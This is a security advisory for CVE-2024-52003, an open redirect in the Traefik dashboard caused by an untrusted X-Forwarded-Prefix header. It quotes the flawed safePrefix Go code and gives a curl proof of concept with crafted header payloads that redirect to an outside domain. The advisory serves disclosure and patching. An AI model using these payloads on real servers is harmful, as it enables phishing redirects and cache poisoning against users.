GHSA-h924-8g65-j9wg

Source

https://github.com/advisories/GHSA-h924-8g65-j9wg

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-h924-8g65-j9wg/GHSA-h924-8g65-j9wg.json

JSON Data

https://api.test.osv.dev/v1/vulns/GHSA-h924-8g65-j9wg

Aliases

CVE-2024-52003
GO-2024-3299

Published

2024-12-02T17:12:38Z

Modified

2024-12-02T22:04:59Z

Severity

6.3 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X CVSS Calculator

Summary

Traefik's X-Forwarded-Prefix Header still allows for Open Redirect

Details

Impact

There is a vulnerability in Traefik that allows the client to provide the X-Forwarded-Prefix header from an untrusted source.

Patches

https://github.com/traefik/traefik/releases/tag/v2.11.14
https://github.com/traefik/traefik/releases/tag/v3.2.1

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

<details> <summary>Original Description</summary>

Summary

The previously reported open redirect (GHSA-6qq8-5wq3-86rp) is not fixed correctly. The safePrefix function can be tricked to return an absolute URL.

Details

The Traefik API dashboard component tries to validate that the value of the header X-Forwarded-Prefix is a site relative path:

http.Redirect(resp, req, safePrefix(req)+"/dashboard/", http.StatusFound)

func safePrefix(req *http.Request) string {
    prefix := req.Header.Get("X-Forwarded-Prefix")
    if prefix == "" {
        return ""
    }

    parse, err := url.Parse(prefix)
    if err != nil {
        return ""
    }

    return parse.Path
}

PoC

An attacker can bypass this by sending the following payload:

curl -v 'http://traefik.localhost' -H 'X-Forwarded-Prefix: %0d//a.com'
[...]
> HTTP/1.1 302 Found
> Location: //a.com/dashboard/

or similar:

curl -v 'http://traefik.localhost' -H 'X-Forwarded-Prefix: %2f%2fa.com'
[...]
> HTTP/1.1 302 Found
> Location: //a.com/dashboard/

Impact

Similar to the previously reported bug. In cache poisoning scenarios this may be exploitable. </details>

Database specific

{
    "nvd_published_at": "2024-11-29T19:15:08Z",
    "cwe_ids": [
        "CWE-601"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2024-12-02T17:12:38Z"
}

References

Affected packages

Go / github.com/traefik/traefik/v2

Package

Name: github.com/traefik/traefik/v2; View open source insights on deps.dev
Purl: pkg:golang/github.com/traefik/traefik/v2

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

2.11.14

Go / github.com/traefik/traefik/v3

Package

Name: github.com/traefik/traefik/v3; View open source insights on deps.dev
Purl: pkg:golang/github.com/traefik/traefik/v3

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

3.2.1